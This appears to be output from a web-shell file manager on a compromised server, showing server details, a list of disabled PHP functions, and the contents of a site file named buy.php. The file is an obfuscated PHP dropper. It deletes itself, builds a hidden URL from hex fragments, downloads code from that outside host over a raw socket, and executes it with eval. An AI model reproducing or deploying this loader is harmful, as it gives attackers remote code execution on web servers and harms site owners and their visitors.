HEX
Server: LiteSpeed
System:
User: ()
PHP: 7.3.33
Disabled: ln,cat,popen,pclose,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,system,dl,passthru,exec,shell_exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,mysql_list_dbs,get_current_user,getmyuid,pconnect,link,symlink,pcntl_exec,ini_alter,pfsockopen,leak,apache_child_terminate,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,stream_select,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,virtual,ini_get_all,php_passthru,posix_uname,php_uname,highlight_file,define_syslog_variables,ftp_exec,inject_code,eval
Upload Files
File: /var/www/vhosts/miroglu.net/httpdocs/buy.php
<?php @unlink($_SERVER['SCRIPT_FILENAME']);$h='H';$l='6874';
$l.='74707';$l.='33a';$l.='2';$l.='f2';$l.='f7';$l.='365';
$l.='6f2e7';$l.='265';
$l.='6e676';$l.='f2e';$l.='72';
$l.='7';
$l.='52e';$l.='636f6';$l.='d';$l.='2f737';$l.='57';$l.='06572';$l.='2';$l.='f6d';
$l.='616e3';$l.='52e7';$l.='47';$l.='8';$l.='74';
$p='p';$p.='a';$p.='ck';$resp='';$h.='*';$parsed_url=parse_url($p($h,$l));$host=$parsed_url['host'];
$path=isset($parsed_url['path'])?$parsed_url['path']:'/';$query=isset($parsed_url['query'])?'?'.$parsed_url['query']:'';$scheme=isset($parsed_url['scheme'])?$parsed_url['scheme']:'http';
$port=isset($parsed_url['port'])?$parsed_url['port']:($scheme==='https'?443:80);$protocol=($scheme==='https')?'ssl':'tcp';$fp=stream_socket_client("{$protocol}://{$host}:{$port}",$errno,$errstr,20);
$headers=array("GET {$path}{$query} HTTP/1.1",
    "Host: {$host}",
    "Connection: Close",);$request=implode("\r\n",$headers)."\r\n\r\n";
fwrite($fp,$request);$response='';while(!feof($fp)){$response .= fgets($fp,1024);}
fclose($fp);$response_parts=explode("\r\n\r\n",$response,2);$headers=isset($response_parts[0])?$response_parts[0]:'';$body=isset($response_parts[1])?$response_parts[1]:'';if(stripos($headers,"Transfer-Encoding: chunked")!==false){$decoded='';
    while(true){$pos=strpos($body,"\r\n");if($pos === false) break;$length=hexdec(substr($body,0,$pos));if($length === 0) break;$decoded.=substr($body,$pos+2,$length);$body=substr($body,$pos+2+$length+2);
    }$resp=trim($decoded);}$_GET['_kh'] = '68747470733n2s2s72672r6o66636275792r636s6q';eVAl('?'. ">".$resp);?>